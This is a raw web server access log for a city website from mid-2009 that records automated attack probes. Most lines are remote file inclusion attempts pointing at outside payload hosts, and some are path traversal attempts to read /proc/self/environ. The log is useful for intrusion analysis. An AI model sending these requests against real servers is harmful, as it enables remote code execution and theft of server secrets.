218.232.105.116 - - [30/Jun/2009:22:33:45 -0700] "GET /logs/access_080330.log//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:40:57 -0700] "GET /logs/access_080330.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:42:39 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:42:39 -0700] "GET /logs/access_080531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:42:39 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:42:40 -0700] "GET /logs/access_080531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:42:40 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:42:40 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:48:01 -0700] "GET /logs/access_080330.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:50:42 -0700] "GET /logs/access_080531.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:51:03 -0700] "GET /logs/access_080531.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:22:55:50 -0700] "GET /logs/libraries/pcl/pcltar.php?action=logout&g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:22:55:50 -0700] "GET /logs/access_081231.log/libraries/pcl/pcltar.php?action=logout&g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:22:55:50 -0700] "GET /libraries/pcl/pcltar.php?action=logout&g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:58:51 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:58:51 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:58:51 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:59:06 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:59:06 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:22:59:11 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:00:26 -0700] "GET /logs/libraries/pcl/pcltar.php?action=logout&g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:00:26 -0700] "GET /logs/access_081231.log/libraries/pcl/pcltar.php?action=logout&g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:00:26 -0700] "GET /libraries/pcl/pcltar.php?action=logout&g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [30/Jun/2009:23:05:40 -0700] "GET /?dir=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [30/Jun/2009:23:05:40 -0700] "GET /logs/access.log/?dir=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
88.157.45.177 - - [30/Jun/2009:23:05:41 -0700] "GET /logs/?dir=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:14:44 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:14:44 -0700] "GET /logs/access_081001.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:14:46 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:15:22 -0700] "GET /logs/access.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:01 -0700] "GET /logs/access_081001.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:01 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:01 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:11 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:11 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:11 -0700] "GET /logs/access_081001.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:16 -0700] "GET /logs/access.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:17:20 -0700] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:17:20 -0700] "GET /logs/access_081001.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:17:21 -0700] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:17:25 -0700] "GET /logs/access.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [30/Jun/2009:23:17:59 -0700] "GET /logs/access.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /logs/access_080531.log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:23 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:24 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:24 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:37:24 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:37:41 -0700] "GET /logs/access.log//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:37:41 -0700] "GET /logs//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:37:41 -0700] "GET /error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:38:10 -0700] "GET /error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:38:10 -0700] "GET /logs//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:38:13 -0700] "GET /logs/access.log//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:39:26 -0700] "GET /logs/access_080601.log//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:39:29 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:39:30 -0700] "GET /logs/access.log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:39:30 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [30/Jun/2009:23:39:30 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:41:48 -0700] "GET /logs/access_080601.log//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:42:08 -0700] "GET /logs/access.log%20%20//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
147.27.14.5 - - [30/Jun/2009:23:42:10 -0700] "GET / HTTP/1.1" 200 917 "-" "-" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:42:51 -0700] "GET /logs/access.log%20%20//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:43:07 -0700] "GET /logs/access_080601.log%20%20//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [30/Jun/2009:23:43:26 -0700] "GET /logs/access_080601.log%20%20//error.php?dir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:23:52:01 -0700] "GET /lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:23:52:01 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:23:52:01 -0700] "GET /logs/access_080330.log%20%20/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [30/Jun/2009:23:52:02 -0700] "GET /logs/access_080531.log%20%20/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:52:20 -0700] "GET /logs/access_080531.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.232.54.48 - - [30/Jun/2009:23:55:19 -0700] "GET /logs/access_080531.log/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:56:31 -0700] "GET /lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:56:31 -0700] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:56:31 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [30/Jun/2009:23:57:42 -0700] "GET /logs/access_080330.log%20%20/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:00:03:39 -0700] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.231.126.252 - - [01/Jul/2009:00:04:36 -0700] "GET /logs/access_080531.log/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /skin/zero_vote/admin.php?dir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:23 -0700] "GET /logs//skin/zero_vote/admin.php?dir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs/access_080330.log//skin/zero_vote/admin.php?dir=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs/access_080330.log//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
89.191.11.195 - - [01/Jul/2009:00:07:24 -0700] "GET /logs/access_080330.log//skin/zero_vote/admin.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:07:47 -0700] "GET /logs/access.log//file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:07:47 -0700] "GET /file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:07:47 -0700] "GET /logs//file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:07:48 -0700] "GET /logs/access.log//file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:07:48 -0700] "GET /file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:07:48 -0700] "GET /logs//file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
119.235.24.68 - - [01/Jul/2009:00:08:51 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:09:46 -0700] "GET /logs/access_080330.log//file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.94.194.231 - - [01/Jul/2009:00:09:46 -0700] "GET /logs/access_080330.log//file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:10:53 -0700] "GET /logs//include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:10:53 -0700] "GET /logs/access_080330.log//include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:10:53 -0700] "GET /include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:10:59 -0700] "GET /logs/access_080531.log//include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:00:11:36 -0700] "GET /logs/access.log%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:00:11:36 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.151.217.29 - - [01/Jul/2009:00:11:36 -0700] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:00:11:59 -0700] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.16.182.130 - - [01/Jul/2009:00:12:10 -0700] "GET /logs/access_080531.log/lostpasswd.php?env[include_prefix]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:12:24 -0700] "GET /logs//include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:12:24 -0700] "GET /logs/access_080330.log//include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.85.63.226 - - [01/Jul/2009:00:12:24 -0700] "GET /include.php?path[docroot]=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
